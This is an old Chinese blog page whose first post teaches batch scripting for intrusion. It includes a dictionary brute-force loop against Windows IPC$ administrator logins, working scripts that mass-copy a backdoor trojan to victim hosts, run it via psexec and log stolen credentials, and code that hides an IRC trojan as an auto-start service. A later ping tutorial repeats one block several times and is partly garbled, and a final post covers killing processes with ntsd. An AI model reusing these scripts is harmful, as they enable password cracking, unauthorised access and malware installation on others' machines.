会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或空格定界符号。请注意,这个 for 程序体的语句引用 %i 来取得第二个符号,引用 %j 来取得第三个符号,引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名,您需要用双引号将文件名括起来。为了用这种方式来使用双引号,您还需要使用 usebackq 选项,否则,双引号会被理解成是用作定义某个要分析的字符串的。
%i 专门在 for 语句中得到说明,%j 和 %k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号,只要不试图说明一个高于字母 z 或Z 的变量。请记住,FOR 变量是单一字母、分大小写和全局的同时不能有 52 个以上都在使用中。
您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,用单引号将括号之间的 filenameset 括起来。这样,该字符串会被当作一个文件中的一个单一输入行。
最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进内存,并被当作文件分析。因此,以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
会枚举当前环境中的环境变量名称。
另外,FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:
~I - 删除任何引号("),扩充 %I
%~fI - 将 %I 扩充到一个完全合格的路径名
%~dI - 仅将 %I 扩充到一个驱动器号
%~pI - 仅将 %I 扩充到一个路径
%~nI - 仅将 %I 扩充到一个文件名
%~xI - 仅将 %I 扩充到一个文件扩展名
%~sI - 扩充的路径只含有短名
%~aI - 将 %I 扩充到文件的文件属性
%~tI - 将 %I 扩充到文件的日期/时间
%~zI - 将 %I 扩充到文件的大小
%~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充到找到的第一个完全合格的名称。如果环境变量未被定义,或者没有找到文件,此组合键会扩充空字符串
可以组合修饰符来得到多重结果:
%~dpI - 仅将 %I 扩充到一个驱动器号和路径
%~nxI - 仅将 %I 扩充到一个文件名和扩展名
%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充到找到的第一个驱动器号和路径。
%~ftzaI - 将 %I 扩充到类似输出线路的 DIR
在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名比较易读,而且避免与不分大小写的组合键混淆。
以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。
sample2:
利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。
最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令--
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator" find ":命令成功完成">>D:\ok.txt ,这样就ko了。
sample3:
你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。
主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。
代码雏形:
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.
二、如何在批处理文件中使用参数
批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^
sample2:
当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password username 当着参数来赋给这个批处理,这样就不用每次都打命令了。
@echo off
@net use \\1%\ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。
@if errorlevel 1 echo connection failed
怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3
三、如何使用组合命令(Compound Command)
1.&
Usage:第一条命令 & 第二条命令 [& 第三条命令...]
用这种方法可以同时执行多条命令,而不管命令是否执行成功
Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif
3.
Usage:第一条命令 第二条命令 [ 第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令;
Sample:
C:\Ex4rch>dir sometips.gif del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
组合命令使用的例子:
sample:
@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt
四、管道命令的使用
1. 命令
Usage:第一条命令 第二条命令 [ 第三条命令...]
将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。
sample:
time /t>>D:\IP.log
netstat -n -p tcp find ":3389">>D:\IP.log
start Explorer
看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。
2.>、>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。
sample1:
echo hello world>c:\hello.txt (stupid example?)
sample2:
时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录:
运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,
日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。
3.< 、>& 、<&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
这些并不常用,也就不多做介绍。
No.5
五、如何用批处理文件来操作注册表
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。
1.创建
创建分为两种,一种是创建子项(Subkey)
我们创建一个文件,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。
另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"
Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”
2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了;
我们再看看删除一个子项,我们创建一个如下的脚本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。
相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.

类别: 无分类 |  评论(0) |  浏览(20900) |  收藏
2006年09月30日 15:55:00

Ping命令的使用技巧



对于Windows下ping命令相信大家已经再熟悉不过了,但是能把ping的功能发挥到最大的人却并不是很多,当然我也并不是说我可以让ping发挥最大的功能,我也只不过经常用ping这个工具,也总结了一些小经验,现在和大家分享一下。

Ping是个使用频率极高的实用程序,用于确定本地主机是否能与另一台主机交换(发送与接收)数据报。根据返回的信息,我们就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是:成功地与另一台主机进行一次或两次数 据报交换并不表示TCP/IP配置就是正确的,我们必须执行大量的本地主机与远程主机的数据报交换,才能确信TCP/IP的正确性。

  简单的说,Ping就是一个测试程序,如果Ping运行正确,我们大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障,从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送,Ping也被某些别有用心的人作为DDOS(拒绝服务攻击)的工具,例如许多大型的网站就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。

  按照缺省设置,Windows上运行的Ping命令发送4个ICMP(网间控制报文协议)回送请求,每个32字节数据,如果一切正常,我们应能得到4个回送应答。 Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短,表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL(Time To Live存在时间)值,我们可以通过TTL值推算一下数据包已经通过了多少个路由器:源地点TTL起始值(就是比返回TTL略大的一个2的乘方数)-返回时TTL值。例如,返回TTL值为119,那么可以推算数据报离开源地址的TTL起始值为128,而源地点到目标地点要通过9个路由器网段(128-119);如果返回TTL值为246,TTL起始值就是256,源地点到目标地点要通过9个路由器网段。

  1、通过Ping检测网络故障的典型次序

  正常情况下,当我们使用Ping命令来查找问题所在或检验网络运行情况时,我们需要使用许多Ping命令,如果所有都运行正确,我们就可以相信基本的连通性和配置参数没有问题;如果某些Ping命令出现运行故障,它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障:

  ·ping 127.0.0.1
  这个Ping命令被送到本地计算机的IP软件,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题。

  ·ping 本机IP
  这个命令被送到我们计算机所配置的IP地址,我们的计算机始终都应该对该Ping命令作出应答,如果没有,则表示本地配置或安装存在问题。出现此问题时,局域网用户请断开网络电缆,然后重新发送该命令。如果网线断开后本命令正确,则表示另一台计算机可能配置了相同的IP地址。

  ·ping 局域网内其他IP
  这个命令应该离开我们的计算机,经过网卡及网络电缆到达其他计算机,再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。

  ·ping 网关IP
  这个命令如果应答正确,表示局域网中的网关路由器正在运行并能够作出应答。

  ·ping 远程IP
  如果收到4个应答,表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。

  ·ping localhost
  localhost是个作系统的网络保留名,它是127.0.0.1的别名,每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内,则表示主机文件(/Windows/host)中存在问题。

  ·ping www.xxx.com(如www.yesky.com 天极网)
  对这个域名执行Ping www.xxx.com 地址,通常是通过DNS 服务器 如果这里出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障(对于拨号上网用户,某些ISP已经不需要设置DNS服务器了)。顺便说一句:我们也可以利用该命令实现域名对IP地址的转换功能。

  如果上面所列出的所有Ping命令都能正常运行,那么我们对自己的计算机进行本地和远程通信的功能基本上就可以放心了。但是,这些命令的成功并不表示我们所有的网络配置都没有问题,例如,某些子网掩码错误就可能无法用这些方法检测到。

  2、Ping命令的常用参数选项

  ·ping IP Ct
  连续对IP地址执行Ping命令,直到被用户以Ctrl+C中断。

  ·ping IP -l 3000
  指定Ping命令中的数据长度为3000字节,而不是缺省的32字节。

  ·ping IP Cn
  执行特定次数的Ping命令。



参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧,ping只有在安装了TCP/IP协议以后才可以使用:


  ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list]   [-k computer-list]] [-w timeout] destination-list

  Options:

  -t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.

  不停的ping地方主机,直到你按下Control-C。

  此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。

  -a Resolve addresses to hostnames.

  解析计算机NetBios名。

  示例:C:\>ping -a 192.168.1.21

  Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Ping statistics for 192.168.1.21:

  Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:

  Minimum = 0ms, Maximum = 0ms, Average = 0ms

  从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。

  -n count Number of echo requests to send.

  发送count指定的Echo数据包数。

  在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:

  C:\>ping -n 50 202.103.96.68

  Pinging 202.103.96.68 with 32 bytes of data:

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Request timed out.

  ………………

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Ping statistics for 202.103.96.68:

  Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:

  Minimum = 40ms, Maximum = 51ms, Average = 46ms

  从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。

  -l size Send buffer size. 参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧,ping只有在安装了TCP/IP协议以后才可以使用:


  ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list]   [-k computer-list]] [-w timeout] destination-list

  Options:

  -t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.

  不停的ping地方主机,直到你按下Control-C。

  此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。

  -a Resolve addresses to hostnames.

  解析计算机NetBios名。

  示例:C:\>ping -a 192.168.1.21

  Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Ping statistics for 192.168.1.21:

  Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:

  Minimum = 0ms, Maximum = 0ms, Average = 0ms

  从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。

  -n count Number of echo requests to send.

  发送count指定的Echo数据包数。

  在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:

  C:\>ping -n 50 202.103.96.68

  Pinging 202.103.96.68 with 32 bytes of data:

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Request timed out.

  ………………

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Ping statistics for 202.103.96.68:

  Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:

  Minimum = 40ms, Maximum = 51ms, Average = 46ms

  从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。

  -l size Send buffer size. 参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧,ping只有在安装了TCP/IP协议以后才可以使用:


  ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list]   [-k computer-list]] [-w timeout] destination-list

  Options:

  -t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.

  不停的ping地方主机,直到你按下Control-C。

  此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。

  -a Resolve addresses to hostnames.

  解析计算机NetBios名。

  示例:C:\>ping -a 192.168.1.21

  Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Ping statistics for 192.168.1.21:

  Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:

  Minimum = 0ms, Maximum = 0ms, Average = 0ms

  从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。

  -n count Number of echo requests to send.

  发送count指定的Echo数据包数。

  在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:

  C:\>ping -n 50 202.103.96.68

  Pinging 202.103.96.68 with 32 bytes of data:

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Request timed out.

  ………………

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Ping statistics for 202.103.96.68:

  Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:

  Minimum = 40ms, Maximum = 51ms, Average = 46ms

  从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。



参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧,ping只有在安装了TCP/IP协议以后才可以使用:


  ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list]   [-k computer-list]] [-w timeout] destination-list

  Options:

  -t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.

  不停的ping地方主机,直到你按下Control-C。

  此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。

  -a Resolve addresses to hostnames.

  解析计算机NetBios名。

  示例:C:\>ping -a 192.168.1.21

  Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Reply from 192.168.1.21: bytes=32 time<10ms TTL=254

  Ping statistics for 192.168.1.21:

  Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:

  Minimum = 0ms, Maximum = 0ms, Average = 0ms

  从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。

  -n count Number of echo requests to send.

  发送count指定的Echo数据包数。

  在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:

  C:\>ping -n 50 202.103.96.68

  Pinging 202.103.96.68 with 32 bytes of data:

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Request timed out.

  ………………

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

  Ping statistics for 202.103.96.68:

  Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:

  Minimum = 40ms, Maximum = 51ms, Average = 46ms

  从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。

 -s count Timestamp for count hops.

  指定 count 指定的跃点数的时间戳。

  此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。

  -j host-list Loose source route along host-list.

  利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。

  -k host-list Strict source route along host-list.

  利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。

  -w timeout Timeout in milliseconds to wait for each reply.

  指定超时间隔,单位为毫秒。

  此参数没有什么其他技巧。

  ping命令的其他技巧:在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]

  "DefaultTTL"=dword:000000ff

  255---FF

  128---80

  64----40

  32----20

  好了,ping命令也基本上完全讲解完了,其中还有-j,-k参数我还没有详细说明,由于某些原因也包括我自己所收集的资料过少这里也没有向大家详细介绍,请大家见谅,如果在看了这篇文章的朋友当中有知道得比我更多的,以及其他使用技巧的也希望您能告诉我,并在此先谢过!

类别: 无分类 |  评论(1) |  浏览(18170) |  收藏
2006年09月30日 14:47:08

一个罕为人知的无敌命令 几乎清除所有进程



问:怎么才能关掉一个用任务管理器关不了的进程?我前段时间发现我的机子里多了一个进程,只要开机就在,我用任务管理器却怎么关也关不了

  答1:杀进程很容易,随便找个工具都行。比如IceSword。关键是找到这个进程的启动方式,不然下次重启它又出来了。顺便教大家一招狠的。其实用Windows自带的工具就能杀大部分进程:

  c:\>ntsd -c q -p PID

  只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的,最后那个是Win32子系统,ntsd本身需要它。ntsd从2000开始就是系统自带的用户态调试工具。被调试器附着(attach)的进程会随调试器一起退出,所以可以用来在命令行下终止进程。使用ntsd自动就获得了debug权限,从而能杀掉大部分的进程。ntsd会新开一个调试窗口,本来在纯命令行下无法控制,但如果只是简单的命令,比如退出(q),用-c参数从命令行传递就行了。NtsdNtsd 按照惯例也向软件